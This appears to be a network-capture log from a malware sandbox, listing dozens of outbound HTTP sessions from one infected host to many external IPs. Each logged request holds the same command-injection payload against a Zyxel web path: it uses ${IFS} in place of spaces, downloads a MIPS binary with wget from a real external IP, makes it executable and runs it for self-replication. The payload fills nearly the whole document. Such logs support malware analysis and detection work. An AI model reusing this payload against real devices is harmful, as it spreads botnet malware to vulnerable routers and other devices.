                                                        Jan 28, 2024 10:13:05.655026913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7708192.168.2.145223888.210.216.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655061007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7709192.168.2.145554257.72.129.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655118942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7710192.168.2.143513870.251.195.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655167103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7711192.168.2.145633844.182.153.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655184031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7712192.168.2.1444246203.104.193.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655235052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7713192.168.2.1444336222.124.54.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655296087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7714192.168.2.143285843.152.61.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655332088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7715192.168.2.1439398181.163.253.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655364037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7716192.168.2.1455192134.205.128.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655395985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7717192.168.2.1448336162.215.205.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655446053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7718192.168.2.1443974133.16.22.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655469894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7719192.168.2.1450886119.206.211.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655507088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7720192.168.2.1454286138.36.240.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655548096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7721192.168.2.145491847.16.66.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655596018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7722192.168.2.1433218130.153.44.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655612946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7723192.168.2.1458704192.185.46.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655644894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7724192.168.2.144631281.125.220.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655705929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7725192.168.2.1442436206.172.180.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655739069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7726192.168.2.1439780115.183.62.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655770063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7727192.168.2.145753248.126.145.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655810118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7728192.168.2.1445404102.87.62.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655844927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7729192.168.2.145499051.67.95.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655875921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7730192.168.2.145576027.202.231.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655932903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7731192.168.2.1443598217.108.180.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655965090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7732192.168.2.1437176149.147.69.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.655992985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7733192.168.2.1451154210.102.181.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656045914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7734192.168.2.146098642.183.222.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656092882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7735192.168.2.143577893.213.98.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656117916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7736192.168.2.145331889.214.190.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656174898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7737192.168.2.143609649.191.25.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656210899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7738192.168.2.1455836188.26.60.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656244040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7739192.168.2.143953289.123.229.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656259060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7740192.168.2.144854457.198.183.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656285048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7741192.168.2.145935637.46.77.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656359911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7742192.168.2.145596218.87.232.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656379938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7743192.168.2.144797212.186.58.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656426907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7744192.168.2.1454432172.154.141.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656482935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7745192.168.2.145234277.148.198.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656523943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7746192.168.2.143972492.145.113.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656569958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7747192.168.2.144698440.64.32.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656589031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7748192.168.2.1440110199.189.12.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656637907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7749192.168.2.1455468126.246.130.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656687021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7750192.168.2.1442000116.89.49.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656738043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7751192.168.2.1439538147.17.24.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656769037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7752192.168.2.1445944137.206.127.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656824112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7753192.168.2.14603682.221.223.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656832933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7754192.168.2.144638654.251.169.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656896114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7755192.168.2.1459922223.240.155.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656932116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7756192.168.2.1441796154.231.115.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.656986952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7757192.168.2.145755047.57.93.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.657005072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7758192.168.2.144363462.223.190.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.657042980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7759192.168.2.143806854.1.157.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.657643080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7760192.168.2.1435552124.135.0.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.657867908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7761192.168.2.143826886.61.10.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.659738064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7762192.168.2.144199635.163.186.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.660957098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7763192.168.2.145621865.1.10.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.660994053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7764192.168.2.1434752160.215.133.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661048889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7765192.168.2.1433122219.12.62.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661094904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7766192.168.2.144340646.188.203.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661144972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7767192.168.2.14522084.220.31.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661174059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7768192.168.2.1457298202.160.152.207443
                                                        TimestampBytes transferredDirectionData
